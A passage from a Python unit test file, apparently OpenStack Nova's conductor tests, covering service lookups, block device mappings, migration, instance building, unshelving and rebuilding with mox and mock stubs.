self.conductor.block_device_mapping_update_or_create(self.context,
fake_bdm,
create=True)
self.conductor.block_device_mapping_update_or_create(self.context,
fake_bdm,
create=False)
self.conductor.block_device_mapping_update_or_create(self.context,
fake_bdm)
def _test_stubbed(self, name, dbargs, condargs,
db_result_listified=False, db_exception=None):
self.mox.StubOutWithMock(db, name)
if db_exception:
getattr(db, name)(self.context, *dbargs).AndRaise(db_exception)
else:
getattr(db, name)(self.context, *dbargs).AndReturn('fake-result')
self.mox.ReplayAll()
if db_exception:
self.assertRaises(db_exception.__class__,
self.conductor.service_get_all_by,
self.context, **condargs)
else:
result = self.conductor.service_get_all_by(self.context,
**condargs)
if db_result_listified:
self.assertEqual(['fake-result'], result)
else:
self.assertEqual('fake-result', result)
def test_service_get_all(self):
self._test_stubbed('service_get_all', (),
dict(topic=None, host=None, binary=None))
def test_service_get_by_host_and_topic(self):
self._test_stubbed('service_get_by_host_and_topic',
('host', 'topic'),
dict(topic='topic', host='host', binary=None))
def test_service_get_all_by_topic(self):
self._test_stubbed('service_get_all_by_topic',
('topic',),
dict(topic='topic', host=None, binary=None))
def test_service_get_all_by_host(self):
self._test_stubbed('service_get_all_by_host',
('host',),
dict(host='host', topic=None, binary=None))
def test_service_get_by_compute_host(self):
self._test_stubbed('service_get_by_compute_host',
('host',),
dict(topic='compute', host='host', binary=None),
db_result_listified=True)
def test_service_get_by_args(self):
self._test_stubbed('service_get_by_args',
('host', 'binary'),
dict(host='host', binary='binary', topic=None))
def test_service_get_by_compute_host_not_found(self):
self._test_stubbed('service_get_by_compute_host',
('host',),
dict(topic='compute', host='host', binary=None),
db_exception=exc.ComputeHostNotFound(host='host'))
def test_service_get_by_args_not_found(self):
self._test_stubbed('service_get_by_args',
('host', 'binary'),
dict(host='host', binary='binary', topic=None),
db_exception=exc.HostBinaryNotFound(binary='binary',
host='host'))
def test_security_groups_trigger_handler(self):
self.mox.StubOutWithMock(self.conductor_manager.security_group_api,
'trigger_handler')
self.conductor_manager.security_group_api.trigger_handler('event',
self.context,
'arg')
self.mox.ReplayAll()
self.conductor.security_groups_trigger_handler(self.context,
'event', ['arg'])
@mock.patch.object(db, 'service_update')
@mock.patch('oslo.messaging.RPCClient.prepare')
def test_service_update_time_big(self, mock_prepare, mock_update):
CONF.set_override('report_interval', 10)
services = {'id': 1}
self.conductor.service_update(self.context, services, {})
mock_prepare.assert_called_once_with(timeout=9)
@mock.patch.object(db, 'service_update')
@mock.patch('oslo.messaging.RPCClient.prepare')
def test_service_update_time_small(self, mock_prepare, mock_update):
CONF.set_override('report_interval', 3)
services = {'id': 1}
self.conductor.service_update(self.context, services, {})
mock_prepare.assert_called_once_with(timeout=3)
@mock.patch.object(db, 'service_update')
@mock.patch('oslo.messaging.RPCClient.prepare')
def test_service_update_no_time(self, mock_prepare, mock_update):
CONF.set_override('report_interval', None)
services = {'id': 1}
self.conductor.service_update(self.context, services, {})
mock_prepare.assert_called_once_with()
class ConductorAPITestCase(_BaseTestCase, test.TestCase):
"""Conductor API Tests."""
def setUp(self):
super(ConductorAPITestCase, self).setUp()
self.conductor_service = self.start_service(
'conductor', manager='nova.conductor.manager.ConductorManager')
self.conductor = conductor_api.API()
self.conductor_manager = self.conductor_service.manager
self.db = None
def _do_update(self, instance_uuid, **updates):
# NOTE(danms): the public API takes actual keyword arguments,
# so override the base class here to make the call correctly
return self.conductor.instance_update(self.context, instance_uuid,
**updates)
def test_bw_usage_get(self):
self.mox.StubOutWithMock(db, 'bw_usage_update')
self.mox.StubOutWithMock(db, 'bw_usage_get')
get_args = (self.context, 'uuid', 0, 'mac')
db.bw_usage_get(*get_args).AndReturn('foo')
self.mox.ReplayAll()
result = self.conductor.bw_usage_get(*get_args)
self.assertEqual(result, 'foo')
def test_block_device_mapping_update_or_create(self):
self.mox.StubOutWithMock(db, 'block_device_mapping_create')
self.mox.StubOutWithMock(db, 'block_device_mapping_update')
self.mox.StubOutWithMock(db, 'block_device_mapping_update_or_create')
self.mox.StubOutWithMock(block_device_obj.BlockDeviceMapping,
'_from_db_object')
db.block_device_mapping_create(self.context, 'fake-bdm')
block_device_obj.BlockDeviceMapping._from_db_object(
self.context, mox.IgnoreArg(), mox.IgnoreArg())
db.block_device_mapping_update(self.context,
'fake-id', {'id': 'fake-id'})
block_device_obj.BlockDeviceMapping._from_db_object(
self.context, mox.IgnoreArg(), mox.IgnoreArg())
db.block_device_mapping_update_or_create(self.context, 'fake-bdm')
block_device_obj.BlockDeviceMapping._from_db_object(
self.context, mox.IgnoreArg(), mox.IgnoreArg())
self.mox.ReplayAll()
self.conductor.block_device_mapping_create(self.context, 'fake-bdm')
self.conductor.block_device_mapping_update(self.context, 'fake-id', {})
self.conductor.block_device_mapping_update_or_create(self.context,
'fake-bdm')
def _test_stubbed(self, name, *args, **kwargs):
if args and isinstance(args[0], FakeContext):
ctxt = args[0]
args = args[1:]
else:
ctxt = self.context
db_exception = kwargs.get('db_exception')
self.mox.StubOutWithMock(db, name)
if db_exception:
getattr(db, name)(ctxt, *args).AndRaise(db_exception)
else:
getattr(db, name)(ctxt, *args).AndReturn('fake-result')
if name == 'service_destroy':
# TODO(russellb) This is a hack ... SetUp() starts the conductor()
# service. There is a cleanup step that runs after this test which
# also deletes the associated service record. This involves a call
# to db.service_destroy(), which we have stubbed out.
db.service_destroy(mox.IgnoreArg(), mox.IgnoreArg())
self.mox.ReplayAll()
if db_exception:
self.assertRaises(db_exception.__class__,
getattr(self.conductor, name),
self.context, *args)
else:
result = getattr(self.conductor, name)(self.context, *args)
self.assertEqual(
result, 'fake-result' if kwargs.get('returns', True) else None)
def test_service_get_all(self):
self._test_stubbed('service_get_all')
def test_service_get_by_host_and_topic(self):
self._test_stubbed('service_get_by_host_and_topic', 'host', 'topic')
def test_service_get_all_by_topic(self):
self._test_stubbed('service_get_all_by_topic', 'topic')
def test_service_get_all_by_host(self):
self._test_stubbed('service_get_all_by_host', 'host')
def test_service_get_by_compute_host(self):
self._test_stubbed('service_get_by_compute_host', 'host')
def test_service_get_by_args(self):
self._test_stubbed('service_get_by_args', 'host', 'binary')
def test_service_get_by_compute_host_not_found(self):
self._test_stubbed('service_get_by_compute_host', 'host',
db_exception=exc.ComputeHostNotFound(host='host'))
def test_service_get_by_args_not_found(self):
self._test_stubbed('service_get_by_args', 'host', 'binary',
db_exception=exc.HostBinaryNotFound(binary='binary',
host='host'))
def test_service_create(self):
self._test_stubbed('service_create', {})
def test_service_destroy(self):
self._test_stubbed('service_destroy', '', returns=False)
def test_service_update(self):
ctxt = self.context
self.mox.StubOutWithMock(db, 'service_update')
db.service_update(ctxt, '', {}).AndReturn('fake-result')
self.mox.ReplayAll()
result = self.conductor.service_update(self.context, {'id': ''}, {})
self.assertEqual(result, 'fake-result')
def test_instance_get_all_by_host_and_node(self):
self._test_stubbed('instance_get_all_by_host_and_node',
self.context.elevated(), 'host', 'node')
def test_instance_get_all_by_host(self):
self.mox.StubOutWithMock(db, 'instance_get_all_by_host')
self.mox.StubOutWithMock(db, 'instance_get_all_by_host_and_node')
db.instance_get_all_by_host(self.context.elevated(), 'host',
None).AndReturn('fake-result')
self.mox.ReplayAll()
result = self.conductor.instance_get_all_by_host(self.context,
'host', None)
self.assertEqual(result, 'fake-result')
def test_wait_until_ready(self):
timeouts = []
calls = dict(count=0)
def fake_ping(context, message, timeout):
timeouts.append(timeout)
calls['count'] += 1
if calls['count'] < 15:
raise messaging.MessagingTimeout("fake")
self.stubs.Set(self.conductor.base_rpcapi, 'ping', fake_ping)
self.conductor.wait_until_ready(self.context)
self.assertEqual(timeouts.count(10), 10)
self.assertIn(None, timeouts)
def test_security_groups_trigger_handler(self):
self.mox.StubOutWithMock(self.conductor_manager.security_group_api,
'trigger_handler')
self.conductor_manager.security_group_api.trigger_handler('event',
self.context,
'arg')
self.mox.ReplayAll()
self.conductor.security_groups_trigger_handler(self.context,
'event', 'arg')
class ConductorLocalAPITestCase(ConductorAPITestCase):
"""Conductor LocalAPI Tests."""
def setUp(self):
super(ConductorLocalAPITestCase, self).setUp()
self.conductor = conductor_api.LocalAPI()
self.conductor_manager = self.conductor._manager._target
self.db = db
def test_client_exceptions(self):
instance = self._create_fake_instance()
# NOTE(danms): The LocalAPI should not raise exceptions wrapped
# in ClientException. KeyError should be raised if an invalid
# update key is passed, so use that to validate.
self.assertRaises(KeyError,
self._do_update, instance['uuid'], foo='bar')
def test_wait_until_ready(self):
# Override test in ConductorAPITestCase
pass
class ConductorImportTest(test.TestCase):
def test_import_conductor_local(self):
self.flags(use_local=True, group='conductor')
self.assertIsInstance(conductor.API(), conductor_api.LocalAPI)
self.assertIsInstance(conductor.ComputeTaskAPI(),
conductor_api.LocalComputeTaskAPI)
def test_import_conductor_rpc(self):
self.flags(use_local=False, group='conductor')
self.assertIsInstance(conductor.API(), conductor_api.API)
self.assertIsInstance(conductor.ComputeTaskAPI(),
conductor_api.ComputeTaskAPI)
def test_import_conductor_override_to_local(self):
self.flags(use_local=False, group='conductor')
self.assertIsInstance(conductor.API(use_local=True),
conductor_api.LocalAPI)
self.assertIsInstance(conductor.ComputeTaskAPI(use_local=True),
conductor_api.LocalComputeTaskAPI)
class ConductorPolicyTest(test.TestCase):
def test_all_allowed_keys(self):
def fake_db_instance_update(self, *args, **kwargs):
return None, None
self.stubs.Set(db, 'instance_update_and_get_original',
fake_db_instance_update)
ctxt = context.RequestContext('fake-user', 'fake-project')
conductor = conductor_api.LocalAPI()
updates = {}
for key in conductor_manager.allowed_updates:
if key in conductor_manager.datetime_fields:
updates[key] = timeutils.utcnow()
else:
updates[key] = 'foo'
conductor.instance_update(ctxt, 'fake-instance', **updates)
def test_allowed_keys_are_real(self):
instance = models.Instance()
keys = list(conductor_manager.allowed_updates)
# NOTE(danms): expected_task_state is a parameter that gets
# passed to the db layer, but is not actually an instance attribute
del keys[keys.index('expected_task_state')]
for key in keys:
self.assertTrue(hasattr(instance, key))
class _BaseTaskTestCase(object):
def setUp(self):
super(_BaseTaskTestCase, self).setUp()
self.user_id = 'fake'
self.project_id = 'fake'
self.context = FakeContext(self.user_id, self.project_id)
fake_server_actions.stub_out_action_events(self.stubs)
def fake_deserialize_context(serializer, ctxt_dict):
self.assertEqual(self.context.user_id, ctxt_dict['user_id'])
self.assertEqual(self.context.project_id, ctxt_dict['project_id'])
return self.context
self.stubs.Set(rpc.RequestContextSerializer, 'deserialize_context',
fake_deserialize_context)
def _prepare_rebuild_args(self, update_args=None):
rebuild_args = {'new_pass': 'admin_password',
'injected_files': 'files_to_inject',
'image_ref': 'image_ref',
'orig_image_ref': 'orig_image_ref',
'orig_sys_metadata': 'orig_sys_meta',
'bdms': {},
'recreate': False,
'on_shared_storage': False,
'preserve_ephemeral': False,
'host': 'compute-host'}
if update_args:
rebuild_args.update(update_args)
return rebuild_args
def test_live_migrate(self):
inst = fake_instance.fake_db_instance()
inst_obj = objects.Instance._from_db_object(
self.context, objects.Instance(), inst, [])
self.mox.StubOutWithMock(live_migrate, 'execute')
live_migrate.execute(self.context,
mox.IsA(objects.Instance),
'destination',
'block_migration',
'disk_over_commit')
self.mox.ReplayAll()
if isinstance(self.conductor, (conductor_api.ComputeTaskAPI,
conductor_api.LocalComputeTaskAPI)):
# The API method is actually 'live_migrate_instance'. It gets
# converted into 'migrate_server' when doing RPC.
self.conductor.live_migrate_instance(self.context, inst_obj,
'destination', 'block_migration', 'disk_over_commit')
else:
self.conductor.migrate_server(self.context, inst_obj,
{'host': 'destination'}, True, False, None,
'block_migration', 'disk_over_commit')
def test_cold_migrate(self):
self.mox.StubOutWithMock(compute_utils, 'get_image_metadata')
self.mox.StubOutWithMock(scheduler_utils, 'build_request_spec')
self.mox.StubOutWithMock(
self.conductor_manager.compute_rpcapi, 'prep_resize')
self.mox.StubOutWithMock(self.conductor_manager.scheduler_client,
'select_destinations')
inst = fake_instance.fake_db_instance(image_ref='image_ref')
inst_obj = objects.Instance._from_db_object(
self.context, objects.Instance(), inst, [])
flavor = flavors.get_default_flavor()
flavor['extra_specs'] = 'extra_specs'
request_spec = {'instance_type': flavor,
'instance_properties': {}}
compute_utils.get_image_metadata(
self.context, self.conductor_manager.image_api,
'image_ref', mox.IsA(objects.Instance)).AndReturn('image')
scheduler_utils.build_request_spec(
self.context, 'image',
[mox.IsA(objects.Instance)],
instance_type=flavor).AndReturn(request_spec)
hosts = [dict(host='host1', nodename=None, limits={})]
self.conductor_manager.scheduler_client.select_destinations(
self.context, request_spec,
{'retry': {'num_attempts': 1, 'hosts': []}}).AndReturn(hosts)
filter_properties = {'limits': {},
'retry': {'num_attempts': 1,
'hosts': [['host1', None]]}}
self.conductor_manager.compute_rpcapi.prep_resize(
self.context, 'image', mox.IsA(objects.Instance),
mox.IsA(dict), 'host1', [], request_spec=request_spec,
filter_properties=filter_properties, node=None)
self.mox.ReplayAll()
scheduler_hint = {'filter_properties': {}}
if isinstance(self.conductor, (conductor_api.ComputeTaskAPI,
conductor_api.LocalComputeTaskAPI)):
# The API method is actually 'resize_instance'. It gets
# converted into 'migrate_server' when doing RPC.
self.conductor.resize_instance(
self.context, inst_obj, {}, scheduler_hint, flavor, [])
else:
self.conductor.migrate_server(
self.context, inst_obj, scheduler_hint,
False, False, flavor, None, None, [])
def test_build_instances(self):
system_metadata = flavors.save_flavor_info({},
flavors.get_default_flavor())
instances = [fake_instance.fake_instance_obj(
self.context,
system_metadata=system_metadata,
expected_attrs=['system_metadata']) for i in xrange(2)]
instance_type = flavors.extract_flavor(instances[0])
instance_type['extra_specs'] = 'fake-specs'
instance_properties = jsonutils.to_primitive(instances[0])
self.mox.StubOutWithMock(db, 'flavor_extra_specs_get')
self.mox.StubOutWithMock(self.conductor_manager.scheduler_client,
'select_destinations')
self.mox.StubOutWithMock(db, 'instance_get_by_uuid')
self.mox.StubOutWithMock(db,
'block_device_mapping_get_all_by_instance')
self.mox.StubOutWithMock(self.conductor_manager.compute_rpcapi,
'build_and_run_instance')
db.flavor_extra_specs_get(
self.context,
instance_type['flavorid']).AndReturn('fake-specs')
self.conductor_manager.scheduler_client.select_destinations(
self.context, {'image': {'fake_data': 'should_pass_silently'},
'instance_properties': jsonutils.to_primitive(
instances[0]),
'instance_type': instance_type,
'instance_uuids': [inst.uuid for inst in instances],
'num_instances': 2},
{'retry': {'num_attempts': 1, 'hosts': []}}).AndReturn(
[{'host': 'host1', 'nodename': 'node1', 'limits': []},
{'host': 'host2', 'nodename': 'node2', 'limits': []}])
db.instance_get_by_uuid(self.context, instances[0].uuid,
columns_to_join=['system_metadata'],
use_slave=False).AndReturn(
jsonutils.to_primitive(instances[0]))
db.block_device_mapping_get_all_by_instance(self.context,
instances[0].uuid, use_slave=False).AndReturn([])
self.conductor_manager.compute_rpcapi.build_and_run_instance(
self.context,
instance=mox.IgnoreArg(),
host='host1',
image={'fake_data': 'should_pass_silently'},
request_spec={
'image': {'fake_data': 'should_pass_silently'},
'instance_properties': instance_properties,
'instance_type': instance_type,
'instance_uuids': [inst.uuid for inst in instances],
'num_instances': 2},
filter_properties={'retry': {'num_attempts': 1,
'hosts': [['host1', 'node1']]},
'limits': []},
admin_password='admin_password',
injected_files='injected_files',
requested_networks=None,
security_groups='security_groups',
block_device_mapping=mox.IgnoreArg(),
node='node1', limits=[])
db.instance_get_by_uuid(self.context, instances[1].uuid,
columns_to_join=['system_metadata'],
use_slave=False).AndReturn(
jsonutils.to_primitive(instances[1]))
db.block_device_mapping_get_all_by_instance(self.context,
instances[1].uuid, use_slave=False).AndReturn([])
self.conductor_manager.compute_rpcapi.build_and_run_instance(
self.context,
instance=mox.IgnoreArg(),
host='host2',
image={'fake_data': 'should_pass_silently'},
request_spec={
'image': {'fake_data': 'should_pass_silently'},
'instance_properties': instance_properties,
'instance_type': instance_type,
'instance_uuids': [inst.uuid for inst in instances],
'num_instances': 2},
filter_properties={'limits': [],
'retry': {'num_attempts': 1,
'hosts': [['host2', 'node2']]}},
admin_password='admin_password',
injected_files='injected_files',
requested_networks=None,
security_groups='security_groups',
block_device_mapping=mox.IgnoreArg(),
node='node2', limits=[])
self.mox.ReplayAll()
# build_instances() is a cast, we need to wait for it to complete
self.useFixture(cast_as_call.CastAsCall(self.stubs))
self.conductor.build_instances(self.context,
instances=instances,
image={'fake_data': 'should_pass_silently'},
filter_properties={},
admin_password='admin_password',
injected_files='injected_files',
requested_networks=None,
security_groups='security_groups',
block_device_mapping='block_device_mapping',
legacy_bdm=False)
def test_build_instances_scheduler_failure(self):
instances = [fake_instance.fake_instance_obj(self.context)
for i in xrange(2)]
image = {'fake-data': 'should_pass_silently'}
spec = {'fake': 'specs',
'instance_properties': instances[0]}
exception = exc.NoValidHost(reason='fake-reason')
self.mox.StubOutWithMock(scheduler_utils, 'build_request_spec')
self.mox.StubOutWithMock(scheduler_driver, 'handle_schedule_error')
self.mox.StubOutWithMock(self.conductor_manager.scheduler_client,
'select_destinations')
scheduler_utils.build_request_spec(self.context, image,
mox.IgnoreArg()).AndReturn(spec)
self.conductor_manager.scheduler_client.select_destinations(
self.context, spec,
{'retry': {'num_attempts': 1,
'hosts': []}}).AndRaise(exception)
for instance in instances:
scheduler_driver.handle_schedule_error(self.context, exception,
instance.uuid, spec)
self.mox.ReplayAll()
# build_instances() is a cast, we need to wait for it to complete
self.useFixture(cast_as_call.CastAsCall(self.stubs))
self.conductor.build_instances(self.context,
instances=instances,
image=image,
filter_properties={},
admin_password='admin_password',
injected_files='injected_files',
requested_networks=None,
security_groups='security_groups',
block_device_mapping='block_device_mapping',
legacy_bdm=False)
def test_unshelve_instance_on_host(self):
db_instance = self._create_fake_instance()
instance = objects.Instance.get_by_uuid(self.context,
db_instance['uuid'], expected_attrs=['system_metadata'])
instance.vm_state = vm_states.SHELVED
instance.task_state = task_states.UNSHELVING
instance.save()
system_metadata = instance.system_metadata
self.mox.StubOutWithMock(self.conductor_manager.compute_rpcapi,
'start_instance')
self.mox.StubOutWithMock(self.conductor_manager, '_delete_image')
self.mox.StubOutWithMock(self.conductor_manager.compute_rpcapi,
'unshelve_instance')
self.conductor_manager.compute_rpcapi.start_instance(self.context,
instance)
self.conductor_manager._delete_image(self.context,
'fake_image_id')
self.mox.ReplayAll()
system_metadata['shelved_at'] = timeutils.utcnow()
system_metadata['shelved_image_id'] = 'fake_image_id'
system_metadata['shelved_host'] = 'fake-mini'
self.conductor_manager.unshelve_instance(self.context, instance)
def test_unshelve_offloaded_instance_glance_image_not_found(self):
shelved_image_id = "image_not_found"
db_instance = self._create_fake_instance()
instance = objects.Instance.get_by_uuid(
self.context,
db_instance['uuid'],
expected_attrs=['system_metadata'])
instance.vm_state = vm_states.SHELVED_OFFLOADED
instance.task_state = task_states.UNSHELVING
instance.save()
system_metadata = instance.system_metadata
self.mox.StubOutWithMock(self.conductor_manager.image_api, 'get')
e = exc.ImageNotFound(image_id=shelved_image_id)
self.conductor_manager.image_api.get(
self.context, shelved_image_id).AndRaise(e)
self.mox.ReplayAll()
system_metadata['shelved_at'] = timeutils.utcnow()
system_metadata['shelved_host'] = 'fake-mini'
system_metadata['shelved_image_id'] = shelved_image_id
self.assertRaises(
exc.UnshelveException,
self.conductor_manager.unshelve_instance,
self.context, instance)
self.assertEqual(instance.vm_state, vm_states.ERROR)
def test_unshelve_instance_schedule_and_rebuild(self):
db_instance = self._create_fake_instance()
instance = objects.Instance.get_by_uuid(self.context,
db_instance['uuid'], expected_attrs=['system_metadata'])
instance.vm_state = vm_states.SHELVED_OFFLOADED
instance.save()
filter_properties = {}
system_metadata = instance.system_metadata
self.mox.StubOutWithMock(self.conductor_manager.image_api, 'get')
self.mox.StubOutWithMock(self.conductor_manager, '_schedule_instances')
self.mox.StubOutWithMock(self.conductor_manager.compute_rpcapi,
'unshelve_instance')
self.conductor_manager.image_api.get(self.context,
'fake_image_id').AndReturn('fake_image')
self.conductor_manager._schedule_instances(self.context,
'fake_image', filter_properties, instance).AndReturn(
[{'host': 'fake_host',
'nodename': 'fake_node',
'limits': {}}])
self.conductor_manager.compute_rpcapi.unshelve_instance(self.context,
instance, 'fake_host', image='fake_image',
filter_properties={'limits': {}}, node='fake_node')
self.mox.ReplayAll()
system_metadata['shelved_at'] = timeutils.utcnow()
system_metadata['shelved_image_id'] = 'fake_image_id'
system_metadata['shelved_host'] = 'fake-mini'
self.conductor_manager.unshelve_instance(self.context, instance)
def test_unshelve_instance_schedule_and_rebuild_novalid_host(self):
db_instance = self._create_fake_instance()
instance = objects.Instance.get_by_uuid(self.context,
db_instance['uuid'], expected_attrs=['system_metadata'])
instance.vm_state = vm_states.SHELVED_OFFLOADED
instance.save()
system_metadata = instance.system_metadata
def fake_schedule_instances(context, image, filter_properties,
*instances):
raise exc.NoValidHost(reason='')
with contextlib.nested(
mock.patch.object(self.conductor_manager.image_api, 'get',
return_value='fake_image'),
mock.patch.object(self.conductor_manager, '_schedule_instances',
fake_schedule_instances)
) as (_get_image, _schedule_instances):
system_metadata['shelved_at'] = timeutils.utcnow()
system_metadata['shelved_image_id'] = 'fake_image_id'
system_metadata['shelved_host'] = 'fake-mini'
self.conductor_manager.unshelve_instance(self.context, instance)
_get_image.assert_has_calls([mock.call(self.context,
system_metadata['shelved_image_id'])])
self.assertEqual(vm_states.SHELVED_OFFLOADED, instance.vm_state)
def test_unshelve_instance_schedule_and_rebuild_volume_backed(self):
db_instance = self._create_fake_instance()
instance = objects.Instance.get_by_uuid(self.context,
db_instance['uuid'], expected_attrs=['system_metadata'])
instance.vm_state = vm_states.SHELVED_OFFLOADED
instance.save()
filter_properties = {}
system_metadata = instance.system_metadata
self.mox.StubOutWithMock(self.conductor_manager.image_api, 'get')
self.mox.StubOutWithMock(self.conductor_manager, '_schedule_instances')
self.mox.StubOutWithMock(self.conductor_manager.compute_rpcapi,
'unshelve_instance')
self.conductor_manager.image_api.get(self.context,
'fake_image_id').AndReturn(None)
self.conductor_manager._schedule_instances(self.context,
None, filter_properties, instance).AndReturn(
[{'host': 'fake_host',
'nodename': 'fake_node',
'limits': {}}])
self.conductor_manager.compute_rpcapi.unshelve_instance(self.context,
instance, 'fake_host', image=None,
filter_properties={'limits': {}}, node='fake_node')
self.mox.ReplayAll()
system_metadata['shelved_at'] = timeutils.utcnow()
system_metadata['shelved_image_id'] = 'fake_image_id'
system_metadata['shelved_host'] = 'fake-mini'
self.conductor_manager.unshelve_instance(self.context, instance)
def test_rebuild_instance(self):
db_instance = self._create_fake_instance()
inst_obj = objects.Instance.get_by_uuid(self.context,
db_instance['uuid'])
rebuild_args = self._prepare_rebuild_args({'host': inst_obj.host})
with contextlib.nested(
mock.patch.object(self.conductor_manager.compute_rpcapi,
'rebuild_instance'),
mock.patch.object(self.conductor_manager.scheduler_client,
'select_destinations')
) as (rebuild_mock, select_dest_mock):
self.conductor_manager.rebuild_instance(context=self.context,
instance=inst_obj,
**rebuild_args)
self.assertFalse(select_dest_mock.called)
rebuild_mock.assert_called_once_with(self.context,
instance=inst_obj,
**rebuild_args)
def test_rebuild_instance_with_scheduler(self):
db_instance = self._create_fake_instance()
inst_obj = objects.Instance.get_by_uuid(self.context,
db_instance['uuid'])
inst_obj.host = 'noselect'
rebuild_args = self._prepare_rebuild_args({'host': None})
expected_host = 'thebesthost'
request_spec = {}
filter_properties = {'ignore_hosts': [(inst_obj.host)]}
with contextlib.nested(
mock.patch.object(self.conductor_manager.compute_rpcapi,
'rebuild_instance'),
mock.patch.object(self.conductor_manager.scheduler_client,
'select_destinations',
return_value=[{'host': expected_host}]),
mock.patch('nova.scheduler.utils.build_request_spec',
return_value=request_spec)
) as (rebuild_mock, select_dest_mock, bs_mock):
self.conductor_manager.rebuild_instance(context=self.context,
instance=inst_obj,
**rebuild_args)
select_dest_mock.assert_called_once_with(self.context,
request_spec,
filter_properties)
rebuild_args['host'] = expected_host
rebuild_mock.assert_called_once_with(self.context,
instance=inst_obj,
**rebuild_args)
def test_rebuild_instance_with_scheduler_no_host(self):
db_instance = self._create_fake_instance()
inst_obj = objects.Instance.get_by_uuid(self.context,
db_instance['uuid'])
inst_obj.host = 'noselect'
rebuild_args = self._prepare_rebuild_args({'host': None})
request_spec = {}
filter_properties = {'ignore_hosts': [(inst_obj.host)]}
with contextlib.nested(
mock.patch.object(self.conductor_manager.compute_rpcapi,
'rebuild_instance'),
mock.patch.object(self.conductor_manager.scheduler_client,
'select_destinations',
side_effect=exc.NoValidHost(reason='')),
mock.patch('nova.scheduler.utils.build_request_spec',
return_value=request_spec)
) as (rebuild_mock, select_dest_mock, bs_mock):
self.assertRaises(exc.NoValidHost,
self.conductor_manager.rebuild_instance,
context=self.context, instance=inst_obj,
**rebuild_args)
select_dest_mock.assert_called_once_with(self.context,
request_spec,
filter_properties)
self.assertFalse(rebuild_mock.called)
class ConductorTaskTestCase(_BaseTaskTestCase, test_compute.BaseTestCase):
"""ComputeTaskManager Tests."""
def setUp(self):
super(ConductorTaskTestCase, self).setUp()
self.conductor = conductor_manager.ComputeTaskManager()
self.conductor_manager = self.conductor
def test_migrate_server_fails_with_rebuild(self):
self.assertRaises(NotImplementedError, self.conductor.migrate_server,
self.context, None, None, True, True, None, None, None)
def test_migrate_server_fails_with_flavor(self):
self.assertRaises(NotImplementedError, self.conductor.migrate_server,
self.context, None, None, True, False, "dummy", None, None)
def _build_request_spec(self, instance):
return {
'instance_properties': {
'uuid': instance['uuid'], },
}
def _test_migrate_server_deals_with_expected_exceptions(self, ex):
instance = fake_instance.fake_db_instance(uuid='uuid',
vm_state=vm_states.ACTIVE)
inst_obj = objects.Instance._from_db_object(
self.context, objects.Instance(), instance, [])
self.mox.StubOutWithMock(live_migrate, 'execute')
self.mox.StubOutWithMock(scheduler_utils,
'set_vm_state_and_notify')
live_migrate.execute(self.context, mox.IsA(objects.Instance),
'destination', 'block_migration',
'disk_over_commit').AndRaise(ex)
scheduler_utils.set_vm_state_and_notify(self.context,
'compute_task', 'migrate_server',
{'vm_state': vm_states.ACTIVE,
'task_state': None,
'expected_task_state': task_states.MIGRATING},
ex, self._build_request_spec(inst_obj),
self.conductor_manager.db)
self.mox.ReplayAll()
self.conductor = utils.ExceptionHelper(self.conductor)
self.assertRaises(type(ex),
self.conductor.migrate_server, self.context, inst_obj,
{'host': 'destination'}, True, False, None, 'block_migration',
'disk_over_commit')
def test_migrate_server_deals_with_invalidcpuinfo_exception(self):
instance = fake_instance.fake_db_instance(uuid='uuid',
vm_state=vm_states.ACTIVE)
inst_obj = objects.Instance._from_db_object(
self.context, objects.Instance(), instance, [])
self.mox.StubOutWithMock(live_migrate, 'execute')
self.mox.StubOutWithMock(scheduler_utils,
'set_vm_state_and_notify')
ex = exc.InvalidCPUInfo(reason="invalid cpu info.")
live_migrate.execute(self.context, mox.IsA(objects.Instance),
'destination', 'block_migration',
'disk_over_commit').AndRaise(ex)
scheduler_utils.set_vm_state_and_notify(self.context,
'compute_task', 'migrate_server',
{'vm_state': vm_states.ACTIVE,
'task_state': None,
'expected_task_state': task_states.MIGRATING},
ex, self._build_request_spec(inst_obj),
self.conductor_manager.db)
self.mox.ReplayAll()
self.conductor = utils.ExceptionHelper(self.conductor)
self.assertRaises(exc.InvalidCPUInfo,
self.conductor.migrate_server, self.context, inst_obj,
{'host': 'destination'}, True, False, None, 'block_migration',
'disk_over_commit')
@mock.patch.object(scheduler_utils, 'set_vm_state_and_notify')
@mock.patch.object(live_migrate, 'execute')
def test_migrate_server_deals_with_instancenotrunning_exception(self,
mock_live_migrate, mock_set_state):
inst = fake_instance.fake_db_instance()
inst_obj = objects.Instance._from_db_object(
self.context, objects.Instance(), inst, [])
error = exc.InstanceNotRunning(instance_id="fake")
mock_live_migrate.side_effect = error
self.conductor = utils.ExceptionHelper(self.conductor)
self.assertRaises(exc.InstanceNotRunning,
self.conductor.migrate_server, self.context, inst_obj,
{'host': 'destination'}, True, False, None,
'block_migration', 'disk_over_commit')
request_spec = self._build_request_spec(inst_obj)
mock_set_state.assert_called_once_with(self.context, 'compute_task',
'migrate_server',
dict(vm_state=inst_obj.vm_state,
task_state=None,
expected_task_state=task_states.MIGRATING),
error, request_spec, self.conductor_manager.db)
def test_migrate_server_deals_with_DestinationHypervisorTooOld(self):
ex = exc.DestinationHypervisorTooOld()
self._test_migrate_server_deals_with_expected_exceptions(ex)
def test_migrate_server_deals_with_HypervisorUnavailable(self):
ex = exc.HypervisorUnavailable(host='dummy')
self._test_migrate_server_deals_with_expected_exceptions(ex)
def test_migrate_server_deals_with_unexpected_exceptions(self):
instance = fake_instance.fake_db_instance()
inst_obj = objects.Instance._from_db_object(
self.context, objects.Instance(), instance, [])
self.mox.StubOutWithMock(live_migrate, 'execute')
self.mox.StubOutWithMock(scheduler_utils,
'set_vm_state_and_notify')
ex = IOError()
live_migrate.execute(self.context, mox.IsA(objects.Instance),
'destination', 'block_migration',
'disk_over_commit').AndRaise(ex)
self.mox.ReplayAll()
self.conductor = utils.ExceptionHelper(self.conductor)
self.assertRaises(exc.MigrationError,
self.conductor.migrate_server, self.context, inst_obj,
{'host': 'destination'}, True, False, None, 'block_migration',
'disk_over_commit')
def test_set_vm_state_and_notify(self):
self.mox.StubOutWithMock(scheduler_utils,
'set_vm_state_and_notify')
scheduler_utils.set_vm_state_and_notify(
self.context, 'compute_task', 'method', 'updates',
'ex', 'request_spec', self.conductor.db)
self.mox.ReplayAll()
self.conductor._set_vm_state_and_notify(
self.context, 'method', 'updates', 'ex', 'request_spec')
def test_cold_migrate_no_valid_host_back_in_active_state(self):
flavor = flavors.get_flavor_by_name('m1.tiny')
inst = fake_instance.fake_db_instance(image_ref='fake-image_ref',
instance_type_id=flavor['id'])
inst_obj = objects.Instance._from_db_object(
self.context, objects.Instance(), inst,
expected_attrs=[])
